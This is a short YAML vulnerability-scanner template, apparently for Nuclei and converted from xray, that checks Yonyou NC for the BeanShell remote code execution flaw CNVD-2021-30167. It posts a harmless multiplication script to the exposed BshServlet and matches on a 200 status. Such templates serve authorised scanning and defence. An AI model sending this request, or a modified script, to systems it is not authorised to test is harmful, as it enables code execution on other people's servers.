id: poc-yaml-yonyou-nc-javabeanshell-rce

info:
  name: poc-yaml-yonyou-nc-javabeanshell-rce
  author: xray-converter
  severity: critical
  tags: xray-converted,rce,ct-159054
  reference:
    - https://www.cnvd.org.cn/flaw/show/CNVD-2021-30167

http:
  - raw:
      - |
        POST /servlet/~ic/bsh.servlet.BshServlet HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        bsh.script=print%28{{rand_int(1000, 9999)}}*{{rand_int(1000, 9999)}}%29&bsh.servlet.captureOutErr=true&bsh.servlet.output=raw

    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200